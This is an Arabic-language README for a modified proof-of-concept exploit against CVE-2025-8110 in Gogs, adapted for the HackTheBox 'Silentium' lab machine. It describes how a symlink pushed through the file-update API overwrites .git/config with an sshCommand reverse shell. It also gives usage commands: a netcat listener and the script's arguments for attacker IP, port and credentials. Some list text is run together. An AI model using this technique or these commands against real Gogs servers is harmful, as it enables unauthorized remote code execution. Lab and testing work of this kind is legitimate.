
CVE-2025-8110 مخصصة لـ Silentium box على HTB.
إخلاء مسؤولية: هذه الأداة مخصصة حصريًا للأغراض التعليمية واختبار الاختراق المصرح به. استخدمها فقط ضد الأنظمة التي لديك إذن صريح لاختبارها.
هذه نسخة معدلة من zAbuQasem/gogs-CVE-2025-8110، تم تعديلها للعمل ضد جهاز Silentium على HackTheBox. تطلبت الـ PoC الأصلية تعديلات للتعامل مع تكوين Gogs المحدد لـ Silentium وتدفق المصادقة.
CVE-2025-8110 هي ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) في Gogs، وهي خدمة Git مستضافة ذاتيًا.
لا تقوم نقطة نهاية API لتحديث الملفات في Gogs (PUT /api/v1/repos/.../contents/<file>) بالتحقق مما إذا كان الملف المستهدف عبارة عن رابط رمزي (symlink). يمكن للمهاجم المُصادَق عليه دفع رابط رمزي إلى مستودع يشير إلى .git/config، ثم استخدام API لاستبداله بحمولة ضارة. تقوم الحمولة بحقن sshCommand مخصص في تكوين git، والذي ينفذه Gogs من جانب الخادم في المرة التالية التي يقوم فيها بعملية SSH على ذلك المستودع، مما يؤدي إلى تنفيذ تعليمات برمجية عن بعد.
malicious_link -> .git/config)، ويدفعه..git/config ضار يحتوي على sshCommand = <reverse shell>..git/config الخاص به، مما يؤدي إلى تشغيل الصدفة عند عملية SSH التالية.تثبيت التبعيات:
pip install -r requirements.txt
بدء مستمع:
nc -lvnp <PORT>
تشغيل الأداة:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
اختياري — التوجيه عبر Burp Suite:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| العلم (Flag) | الوصف |
|---|
-u | عنوان URL الأساسي لـ Gogs |
-lh | عنوان IP الخاص بك (الجهاز المهاجم) (مضيف الصدفة العكسية) |
-lp | منفذ المستمع الخاص بك |
-un | اسم مستخدم Gogs المسجل لديك |
-pw | كلمة مرور Gogs الخاصة بك |
-x | (اختياري) توجيه حركة المرور عبر Burp على localhost:8080 |